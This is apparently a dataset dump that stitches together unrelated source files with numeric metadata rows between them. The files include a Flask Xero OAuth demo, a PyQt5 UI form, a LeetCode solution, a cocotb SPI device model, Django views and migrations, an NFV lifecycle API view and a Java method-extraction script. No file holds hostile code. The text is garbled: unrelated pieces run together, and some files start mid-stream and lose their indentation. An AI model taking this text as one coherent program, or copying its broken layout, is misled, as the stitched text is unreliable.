logging_path = os.path.join(os.getcwd(), logging_filename)
with open(logging_path, 'rt') as file:
logging_config = json.load(file)
formatter = os.environ.get('LOGGING_FORMATTER')
logging_config['handlers']['console']['formatter'] = formatter
logging.config.dictConfig(logging_config)
env_str = os.environ.get('LOG_UNHANDLED_EXCEPTIONS')
LOG_UNHANDLED_EXCEPTIONS = env_str.lower() in ('true', 'yes') if env_str else False
# configure flask application
flask_app = FlaskInterface(__name__).get_app()
# configure xero application
xero_app = Xero2(flask_app)
@flask_app.route("/")
def index():
xero_access = dict(xero_app.obtain_xero_oauth2_token() or {})
return render_template(
"code.html",
title="Home | oauth token",
code=jsonify(xero_access),
)
@flask_app.route("/login")
def login():
redirect_url = url_for("oauth_callback", _external=True)
response = xero_app.oauth_app.authorize(callback_uri=redirect_url)
return response
@flask_app.route("/callback")
def oauth_callback():
try:
response = xero_app.oauth_app.authorized_response()
except Exception as e:
print(e)
raise
# todo validate state value
if response is None or response.get("access_token") is None:
return "Access denied: response=%s" % response
xero_app.store_xero_oauth2_token(response)
return redirect(url_for("index", _external=True))
@flask_app.route("/logout")
def logout():
xero_app.store_xero_oauth2_token(None)
return redirect(url_for("index", _external=True))
@flask_app.route("/refresh-token")
def refresh_token():
xero_token = xero_app.obtain_xero_oauth2_token()
new_token = xero_app.refresh_token()
return render_template(
"code.html",
title="Xero OAuth2 token",
code=jsonify({"Old Token": xero_token, "New token": new_token}),
sub_title="token refreshed",
)
@flask_app.route("/tenants")
def tenants():
available_tenants = xero_app.get_tenants()
if available_tenants is None:
return redirect(url_for("login", _external=True))
return render_template(
"code.html",
title="Xero Tenants",
code=jsonify(available_tenants),
)
@flask_app.route("/invoices")
def get_invoices():
invoices = xero_app.get_invoices()
if invoices is None:
return redirect(url_for("login", _external=True))
code = serialize_model(invoices)
sub_title = "Total invoices found: {}".format(len(invoices.invoices))
return render_template(
"code.html", title="Invoices", code=code, sub_title=sub_title
)
# start the app locally
if __name__ == '__main__':
flask_app.run(host='localhost', port=5000)
| 28.376068
| 83
| 0.71506
| 0
| 0
| 0
| 0
| 2,035
| 0.612952
| 0
| 0
| 764
| 0.23012
|
427fcbdb91cef4c0c0751c48d3eb5d865ef45367
| 8,023
|
py
|
Python
|
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(963, 727)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.tab)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.txtRaw = QtWidgets.QTextEdit(self.tab)
self.txtRaw.setObjectName("txtRaw")
self.verticalLayout.addWidget(self.txtRaw)
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
self.btnEncoding.setObjectName("btnEncoding")
self.horizontalLayout.addWidget(self.btnEncoding)
self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
self.btnDecoding.setObjectName("btnDecoding")
self.horizontalLayout.addWidget(self.btnDecoding)
self.btnExchange = QtWidgets.QPushButton(self.groupBox)
self.btnExchange.setObjectName("btnExchange")
self.horizontalLayout.addWidget(self.btnExchange)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
self.btnClear.setSizePolicy(sizePolicy)
self.btnClear.setObjectName("btnClear")
self.horizontalLayout.addWidget(self.btnClear)
self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
self.cboxCodecType.setObjectName("cboxCodecType")
self.cboxCodecType.addItem("")
self.horizontalLayout.addWidget(self.cboxCodecType)
self.verticalLayout.addWidget(self.groupBox)
self.label_2 = QtWidgets.QLabel(self.tab)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.txtResult = QtWidgets.QTextEdit(self.tab)
self.txtResult.setObjectName("txtResult")
self.verticalLayout.addWidget(self.txtResult)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.txtJson = QtWidgets.QTextEdit(self.tab_2)
self.txtJson.setObjectName("txtJson")
self.verticalLayout_2.addWidget(self.txtJson)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
self.groupBox_2.setObjectName("groupBox_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonFormat.setObjectName("btnJsonFormat")
self.horizontalLayout_2.addWidget(self.btnJsonFormat)
self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCompress.setObjectName("btnJsonCompress")
self.horizontalLayout_2.addWidget(self.btnJsonCompress)
self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonEscape.setObjectName("btnJsonEscape")
self.horizontalLayout_2.addWidget(self.btnJsonEscape)
self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonDeescape.setObjectName("btnJsonDeescape")
self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCopy.setObjectName("btnJsonCopy")
self.horizontalLayout_2.addWidget(self.btnJsonCopy)
self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonClear.setObjectName("btnJsonClear")
self.horizontalLayout_2.addWidget(self.btnJsonClear)
self.verticalLayout_2.addWidget(self.groupBox_2)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.btnClear.clicked.connect(self.txtResult.clear)
self.btnClear.clicked.connect(self.txtRaw.clear)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label.setText(_translate("MainWindow", "Raw Text:"))
self.groupBox.setTitle(_translate("MainWindow", "Operation"))
self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
self.btnExchange.setText(_translate("MainWindow", "Exchange"))
self.btnClear.setText(_translate("MainWindow", "Clear"))
self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
self.label_2.setText(_translate("MainWindow", "Result Text:"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 52.782895
| 108
| 0.720429
| 7,537
| 0.939424
| 0
| 0
| 0
| 0
| 0
| 0
| 978
| 0.1219
|
42835a66857dcf283ba037650081bbeeec2eb903
| 587
|
py
|
Python
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 177
|
2017-08-21T08:57:43.000Z
|
2020-06-22T03:44:22.000Z
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 2
|
2018-09-06T13:39:12.000Z
|
2019-06-03T02:54:45.000Z
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 23
|
2017-08-23T06:01:28.000Z
|
2020-04-20T03:17:36.000Z
|
class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
| 22.576923
| 47
| 0.294719
| 587
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.11925
|
4283b88a83b93254b8e97d4642f0ca0d5d69279d
| 68
|
py
|
Python
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
] | 1
|
2019-07-26T22:25:25.000Z
|
2019-07-26T22:25:25.000Z
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
] | 5
|
2019-04-14T21:07:03.000Z
|
2019-05-27T21:46:37.000Z
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
] | null | null | null |
# example.py
import basic
result = basic.add(1, 5)
print(result)
| 8.5
| 24
| 0.691176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.176471
|
4284396ea1fd88ed33820f0870333abd8149c2de
| 2,213
|
py
|
Python
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 2
|
2021-08-13T20:10:41.000Z
|
2022-03-09T19:24:24.000Z
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 3
|
2021-08-23T15:34:00.000Z
|
2022-01-18T19:27:26.000Z
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 2
|
2021-11-12T12:47:45.000Z
|
2021-11-18T10:35:43.000Z
|
import cocotb
from cocotb.triggers import FallingEdge, RisingEdge, First, Timer, Event
from ... import SpiSlaveBase, SpiConfig, SpiFrameError, SpiFrameTimeout
class DRV8304(SpiSlaveBase):
def __init__(self, signals):
self._config = SpiConfig(
word_width=16,
cpol=False,
cpha=True,
msb_first=True,
frame_spacing_ns=400
)
self._registers = {
0: 0b00000000000,
1: 0b00000000000,
2: 0b00000000000,
3: 0b01101110111,
4: 0b11101110111,
5: 0b00101000101,
6: 0b01010000011
}
super().__init__(signals)
async def get_register(self, reg_num):
await self.idle.wait()
return self._registers[reg_num]
def create_spi_word(self, operation, address, content):
command = 0
if operation == "read":
command |= 1 << 15
elif operation == "write":
# it is already 0
pass
else:
raise ValueError("Expected operation to be in ['read', 'write']")
try:
self._registers[address]
except KeyError:
raise ValueError(f"Expected address to be in {list(self._registers.keys())}")
command |= (address & 0b1111) << 11
command |= (content & 0b11111111111)
return command
async def _transaction(self, frame_start, frame_end):
await frame_start
self.idle.clear()
# SCLK pin should be low at the chip select edge
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
do_write = not bool(await self._shift(1))
address = int(await self._shift(4))
content = int(await self._shift(11, tx_word=self._registers[address]))
# end of frame
if await First(frame_end, RisingEdge(self._sclk)) != frame_end:
raise SpiFrameError("DRV8304: clocked more than 16 bits")
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
if do_write:
self._registers[address] = content
| 30.315068
| 89
| 0.589245
| 2,050
| 0.926344
| 0
| 0
| 0
| 0
| 918
| 0.414822
| 332
| 0.150023
|
4289d7f6e86034585cd9c9cf37666cc58aab806e
| 540
|
py
|
Python
|
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | null | null | null |
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | null | null | null |
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | 1
|
2021-11-17T11:03:08.000Z
|
2021-11-17T11:03:08.000Z
|
from app import create_app,db
from flask_script import Manager,Server
from app.models import User,Comment,Blog
from flask_migrate import Migrate, MigrateCommand
#manage.shell
# Creating app instance
app = create_app('production')
migrate = Migrate(app,db)
manager = Manager(app)
manager.add_command('db',MigrateCommand)
manager.add_command('server',Server)
@manager.shell
def make_shell_context():
return dict(db=db,app= app, User = User ,Comment=Comment, Blog=Blog)
if __name__== '__main__':
manager.run()
db.create_all()
| 24.545455
| 72
| 0.766667
| 0
| 0
| 0
| 0
| 113
| 0.209259
| 0
| 0
| 70
| 0.12963
|
428a08abf8ca4b32d91aa59e5ac79f8b3eb02d8f
| 901
|
py
|
Python
|
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 17:19
from __future__ import unicode_literals
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0004_auto_20180417_1218'),
]
operations = [
migrations.AddField(
model_name='topic',
name='ref_id',
field=django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True),
),
migrations.AlterField(
model_name='topic',
name='slug',
field=django_extensions.db.fields.AutoSlugField(blank=True, default='', editable=False, help_text='Please enter a unique slug for this Topic (can autogenerate from name field)', max_length=64, populate_from=('ref_id',), unique=True, verbose_name='slug'),
),
]
| 33.37037
| 266
| 0.657048
| 716
| 0.794673
| 0
| 0
| 0
| 0
| 0
| 0
| 224
| 0.248613
|
428b1f1d92a691f7e032bddbf0f11e16a416cdf3
| 186
|
py
|
Python
|
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | null | null | null |
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | 1
|
2015-12-10T20:42:12.000Z
|
2015-12-10T20:42:12.000Z
|
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | null | null | null |
__author__ = 'Evan Cordell'
__copyright__ = 'Copyright 2012-2015 Localmed, Inc.'
__version__ = "0.1.6"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
| 23.25
| 52
| 0.758065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 60
| 0.322581
|
428b51da1bd2717103e2c7bb03266fb5b3a3af22
| 7,452
|
py
|
Python
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 5
|
2019-03-12T21:38:32.000Z
|
2021-11-06T15:26:56.000Z
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 33
|
2019-01-21T15:54:50.000Z
|
2021-05-18T17:54:52.000Z
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 5
|
2019-01-21T15:47:26.000Z
|
2021-09-22T07:14:34.000Z
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import PasswordResetForm
from django.core.mail import EmailMessage
from django.template import loader
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.db.utils import IntegrityError
from django.urls import reverse
from django.template.loader import render_to_string, get_template
from .forms import NewUserForm, NewAuditRecordForm
from acl.models import Entitlement, PermitType
from members.models import Tag, User, clean_tag_string, AuditRecord
from mailinglists.models import Mailinglist, Subscription
import logging
import datetime
import sys
import re
logger = logging.getLogger(__name__)
@login_required
def index(request):
lst = Entitlement.objects.order_by("holder__id")
agg = {}
perms = {}
output = ""
for e in lst:
if not e.holder in agg:
agg[e.holder] = {}
perms[e.permit.name] = 1
agg[e.holder][e.permit.name] = 1
context = {
"agg": agg,
"perms": perms,
"has_permission": request.user.is_authenticated,
}
return render(request, "members/index.html", context)
@login_required
def newmember(request):
if not request.user.is_privileged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewUserForm(request.POST)
if form.is_valid():
try:
email = form.cleaned_data.get("email")
tag = form.cleaned_data.get("tag")
newmember = User.objects.create_user(
email=email,
first_name=form.cleaned_data.get("first_name"),
last_name=form.cleaned_data.get("last_name"),
)
# Do not set this - it silently blocks the invite mails deep in PasswordResetForm.
#
# newmember.set_unusable_password()
#
newmember.set_password(User.objects.make_random_password())
if form.cleaned_data.get("phone_number"):
newmember.phone_number = form.cleaned_data.get("phone_number")
newmember.changeReason = (
"Added by {} with the newnmeber signup form".format(request.user)
)
newmember.save()
# sanity check.
newmember = User.objects.get(email=email)
# Wire up the tag if one was provided.
if form.cleaned_data.get("tag"):
tag.reassing_to_user(
newmember,
request.user,
activate=form.cleaned_data.get("activate_doors"),
)
# Subscribe user if needed
for mlist_name in form.cleaned_data.get("mailing_lists"):
try:
mlist = Mailinglist.objects.get(name=mlist_name)
s = Subscription.objects.create(
mailinglist=mlist,
member=newmember,
active=True,
digest=False,
)
s.subscribe()
# s.changeReason("Subscribed during form based new user create")
s.save()
except Exception as e:
logger.error(
"Failed to subscribe user {} to {} : {}".format(
request.user, mlist_name, e
)
)
# Send welcome email.
form = PasswordResetForm({"email": newmember.email})
if not form.is_valid():
raise Exception("Internal issue")
form.save(
from_email=settings.DEFAULT_FROM_EMAIL,
email_template_name="members/email_newmembers_invite.txt",
subject_template_name="members/email_newmembers_invite_subject.txt",
)
return redirect("index")
except IntegrityError as e:
logger.error("Failed to create user : {}".format(e))
return HttpResponse(
"Create gone wrong. Was that email or name already added ?",
status=500,
content_type="text/plain",
)
except Exception as e:
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
logger.error(
"Failed to create user : {} at {}:{}".format(filename, lineno, e)
)
return HttpResponse(
"Create gone wrong. Drat.", status=500, content_type="text/plain"
)
else:
logger.debug("Form not valid")
context = {
"label": "Add a new member",
"title": "New Member",
"action": "Invite",
"has_permission": request.user.is_authenticated,
}
context["form"] = NewUserForm()
return render(request, "members/newmember.html", context)
@login_required
def sudo(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewAuditRecordForm(request.POST)
if form.is_valid():
try:
record = form.save(commit=False)
record.user = request.user
record.changeReason = (
f"SUDO escalation in webinterface by {request.user}"
)
record.save()
return redirect(form.cleaned_data.get("return_to"))
# return redirect('index')
except Exception as e:
logger.error("Failed to create uudit recordser : {}".format(e))
return HttpResponse(
"Could not create audit record.",
status=500,
content_type="text/plain",
)
rurl = reverse("index")
if "HTTP_REFERER" in request.META:
rurl = request.META["HTTP_REFERER"]
form = NewAuditRecordForm(None, initial={"return_to": rurl})
context = {
"label": "GDPR (AVG)",
"title": "Become and admin",
"action": "go admin",
"form": form,
"back": "index",
"has_permission": request.user.is_authenticated,
"preamble": render_to_string("precooked_gdpr_options.html"),
}
return render(request, "crud.html", context)
def drop(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
record = AuditRecord(
user=request.user, final=True, action="Drop privs from webinterface"
)
if request.user.is_privileged:
record.changereason = f"DROP in webinterface by {request.user}"
else:
record.changereason = f"DROP in webinterface by {request.user} - but actual permission had already timed out."
record.save()
return redirect(request.META["HTTP_REFERER"])
| 35.485714
| 118
| 0.554616
| 0
| 0
| 0
| 0
| 6,106
| 0.819377
| 0
| 0
| 1,543
| 0.207059
|
428b5eca1188b78557324447b1ddda687b1af59c
| 3,911
|
py
|
Python
|
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | 1
|
2019-10-10T00:52:18.000Z
|
2019-10-10T00:52:18.000Z
|
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC-Files
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | null | null | null |
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC-Files
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | null | null | null |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
@swagger_auto_schema(
request_body=None,
responses={
status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
logger.debug("CreateNSView::get")
ret = GetNSInfoService().get_ns_info()
logger.debug("CreateNSView::get::ret=%s", ret)
resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
request_body=_CreateNsReqSerializer(),
responses={
status.HTTP_201_CREATED: _CreateNsRespSerializer(),
status.HTTP_400_BAD_REQUEST: "Bad Request",
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
logger.debug("Enter CreateNS: %s", request.data)
req_serializer = _CreateNsReqSerializer(data=request.data)
if not req_serializer.is_valid():
raise BadRequestException(req_serializer.errors)
if ignore_case_get(request.data, 'test') == "test":
return Response(
data={'nsInstanceId': "test"},
status=status.HTTP_201_CREATED
)
csar_id = ignore_case_get(request.data, 'csarId')
ns_name = ignore_case_get(request.data, 'nsName')
description = ignore_case_get(request.data, 'description')
context = ignore_case_get(request.data, 'context')
ns_inst_id = CreateNSService(
csar_id,
ns_name,
description,
context
).do_biz()
logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)
resp_serializer = _CreateNsRespSerializer(
data={'nsInstanceId': ns_inst_id,
'nsInstanceName': 'nsInstanceName',
'nsInstanceDescription': 'nsInstanceDescription',
'nsdId': 123,
'nsdInfoId': 456,
'nsState': 'NOT_INSTANTIATED',
'_links': {'self': {'href': 'href'}}})
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
| 41.168421
| 92
| 0.692662
| 2,575
| 0.658399
| 0
| 0
| 2,536
| 0.648428
| 0
| 0
| 968
| 0.247507
|
428be7b7fc4fa9ed70e9c54b4441f37388d4cbd4
| 3,304
|
py
|
Python
|
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | 1
|
2020-02-25T01:53:23.000Z
|
2020-02-25T01:53:23.000Z
|
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | null | null | null |
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | 1
|
2020-10-24T15:30:38.000Z
|
2020-10-24T15:30:38.000Z
|
#!/usr/bin/env python3
import javalang
def isPrimitive(obj):
return not hasattr(obj, '__dict__')
def extract_bad_function_from_text(src):
return extract_function_from_text(src, criterion='bad')
def extract_function_from_text(src, criterion='bad'):
def recursive_find_deepest_child_position(node_body, prev_deepest=0):
child_direct_child_set = None
# line number, don't currently care about column too much
if isinstance(node_body, list):
deepest_position = prev_deepest
node_children = [c for c in node_body if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
else:
if node_body.position is not None:
deepest_position = node_body.position.line
else:
deepest_position = prev_deepest
node_children = [c for c in node_body.children if c is not isPrimitive(c) and c is not None]
if len(node_children) == 0:
return deepest_position
for child in node_children:
try:
if child.position is not None:
child_sub_pos = child.position.line
else:
child_sub_pos = deepest_position
child_direct_child_set = child.children
except AttributeError:
# most likely is not an object
child_sub_pos = deepest_position
if isinstance(child, list):
child_direct_child_set = child
else:
child_direct_child_set = []
if len(child_direct_child_set) > 0:
child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)
if child_sub_pos > deepest_position:
deepest_position = child_sub_pos
return deepest_position
if not isinstance(src, str):
src = src.decode('utf-8')
src_split = src.split('\n')
try:
tree = javalang.parse.parse(src)
for _, node in tree.filter(javalang.tree.MethodDeclaration):
if node.name.lower() == str(criterion).lower():
# tokenise, find the start/end of method,
# and extract from the file
# needed since javalang can't convert back to java src
start_pos = node.position.line
end_pos = None
if (len(node.body) > 0):
end_pos = recursive_find_deepest_child_position(node.body[-1])
if end_pos is None:
end_pos = start_pos
function_text = ""
for line in range(start_pos, end_pos + 1):
function_text += src_split[line - 1]
return function_text
return ""
except (javalang.parser.JavaSyntaxError,
javalang.parser.JavaParserError) as e:
print("ERROR OCCURRED DURING PARSING")
print(e)
def extract_bad_function(file_path):
return extract_function(file_path, criterion='bad')
